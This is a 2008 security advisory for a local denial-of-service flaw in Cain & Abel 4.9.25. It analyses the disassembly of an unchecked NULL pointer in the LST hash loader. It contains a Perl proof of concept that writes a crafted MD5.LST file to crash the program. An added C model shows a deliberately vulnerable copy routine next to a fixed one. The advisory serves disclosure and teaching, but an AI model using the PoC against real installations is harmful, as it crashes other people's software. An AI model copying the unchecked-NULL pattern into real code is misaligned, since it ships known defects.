Title: Cain & Abel <= 4.9.25 Local Denial Of Service
Site: http://www.oxid.it/cain.html
Date: 15.12.2008
Author(s): Glafkos Charalambous glafkos[at]astalavista[dot]com
           George Nicolaou ishtus[at]astalavista[dot]com

Technical Description:

0042DAD1  56            PUSH ESI                                        ; length
0042DAD2  57            PUSH EDI                                        ; hash
0042DAD3  E8 686A1000   CALL dmp_.00534540                              ; check_validity(char *hash, int length), returns the offset of the allocated space
0042DAD8  68 C8010000   PUSH 1C8
0042DADD  8BE8          MOV EBP,EAX                                     ; take the return value of check_validity() and store it in EBP

The function at 0x534540 returns EAX = 00000000 if length >= 1 and any of the characters in the hash is not hexadecimal; otherwise it returns a pointer to allocated memory. That value is stored in EBP and later used as the source of the copy below without ever being tested for zero:

0042DB19  8BF5          MOV ESI,EBP                                     ; ESI = EBP
0042DB1B  F3:A5         REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]  ; crash if ECX != 00
0042DB1D  8BC8          MOV ECX,EAX
0042DB1F  83E1 03       AND ECX,3
0042DB22  F3:A4         REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]    ; crash if the dword copy above had ECX == 00

Crash at 0042DB1B:
ECX=00000004 (decimal 4.) (REP counter)
DS:[ESI]=[00000000]=???
ES:[EDI]=[01500B48]=00000000

(Note that if ECX = 00000000 at 0042DB1B, i.e. the dword counter is zero, the read from address 0 happens at the byte copy at 0042DB22 instead.)

Therefore, as long as the hash contains at least one non-hexadecimal character and its length is greater than 2, Cain crashes with a read from a NULL pointer while loading the LST file. Similar issues exist in other LST files.

POC Code:

#!/usr/bin/perl
#
# Author(s)
#   Glafkos Charalambous [glafkos at astalavista dot com]
#   George Nicolaou     [ishtus at astalavista dot com]
#
# Title    Cain & Abel <= 4.9.25 Local Denial Of Service
# Get your copy: http://www.oxid.it/cain.html
# Date     15.12.2008

use strict;
use warnings;

# 32-character "hash" made of non-hexadecimal characters: check_validity()
# returns 0 for it and the loader copies from a NULL source.
my $evil = "amVsZW5hdnVrb3ZpYzIwMDBAeWFob28u";
my $n    = "\x09" x 2;

# You can also try MD2/MD4 LST
open(my $LST, ">", "MD5.LST") or die "cannot open MD5.LST: $!";
print $LST $evil . $n;
close($LST);
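The following is an added example and not Cain's own code: a C model of the copy path analysed above, with the vulnerable sequence beside a fixed one. It assumes, since the advisory does not say, that check_validity() hands back a heap copy of the hash, that the caller's destination is a fixed-size buffer, and that the hash is the first tab-separated field of an LST line (which is what the PoC writes). The vulnerable function reproduces the two REP MOVS loops and the missing test on EAX; the fixed function rejects the line as soon as check_validity() returns NULL.

```c
/*
 * Added example, not Cain's source: C model of the crash path at 0042DB19..0042DB22.
 * Assumptions (not confirmed by the advisory): check_validity() returns a heap copy
 * of the hash, the destination is a fixed-size buffer, and the hash is the first
 * tab-separated field of an LST line.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Model of the function at 0x534540: returns NULL (EAX = 0) when length >= 1 and
 * any character is not hexadecimal, otherwise a pointer to allocated memory
 * holding a copy of the hash. */
static char *check_validity(const char *hash, int length)
{
    if (length < 0)
        return NULL;
    for (int i = 0; i < length; i++)
        if (!isxdigit((unsigned char)hash[i]))
            return NULL;
    char *p = malloc((size_t)length + 1);
    if (p == NULL)
        return NULL;
    memcpy(p, hash, (size_t)length);
    p[length] = '\0';
    return p;
}

/* Vulnerable variant, mirroring MOV ESI,EBP / REP MOVSD / AND ECX,3 / REP MOVSB:
 * the check_validity() result is used as the copy source without a NULL test, so a
 * non-hex hash makes the first loop with a non-zero count read from address 0.
 * Calling it with a non-hex hash reproduces the crash on purpose. */
static void copy_hash_vulnerable(char *dst, const char *hash, int length)
{
    char *buf = check_validity(hash, length);   /* may be NULL, never checked */
    const char *src = buf;
    for (int i = 0; i < length / 4; i++) {      /* REP MOVSD: faults here if length >= 4 */
        memcpy(dst, src, 4);
        dst += 4;
        src += 4;
    }
    for (int i = 0; i < (length & 3); i++)      /* REP MOVSB: faults here if 1 <= length < 4 */
        *dst++ = *src++;
    free(buf);
}

/* Fixed variant: reject the entry when check_validity() returns NULL and bound
 * the copy by the destination size. Returns 0 on success, -1 on rejection. */
static int copy_hash_safe(char *dst, size_t dstlen, const char *hash, int length)
{
    if (length < 0 || (size_t)length >= dstlen)
        return -1;
    char *buf = check_validity(hash, length);
    if (buf == NULL)                            /* the test missing at 0042DADD */
        return -1;
    memcpy(dst, buf, (size_t)length);
    dst[length] = '\0';
    free(buf);
    return 0;
}

/* Takes the first tab-separated field of an LST line as the hash
 * (assumed layout, matching what the PoC writes). */
static int load_lst_line(const char *line, char *dst, size_t dstlen)
{
    const char *tab = strchr(line, '\t');
    int length = tab ? (int)(tab - line) : (int)strlen(line);
    return copy_hash_safe(dst, dstlen, line, length);
}

int main(void)
{
    /* Constructed input: the line the PoC writes to MD5.LST, and a valid MD5 line. */
    const char *poc_line  = "amVsZW5hdnVrb3ZpYzIwMDBAeWFob28u\t\t";
    const char *good_line = "5f4dcc3b5aa765d61d8327deb882cf99\t\t";
    char dst[64];

    int rc = load_lst_line(poc_line, dst, sizeof dst);
    printf("PoC line:  %s\n", rc == 0 ? "accepted" : "rejected");

    rc = load_lst_line(good_line, dst, sizeof dst);
    printf("good line: %s (%s)\n", rc == 0 ? "accepted" : "rejected", dst);
    return 0;
}
```

The PoC line is rejected by the fixed path and accepted by nothing else; feeding it to copy_hash_vulnerable() instead reproduces the NULL read that the advisory documents, with the faulting loop chosen by length as described.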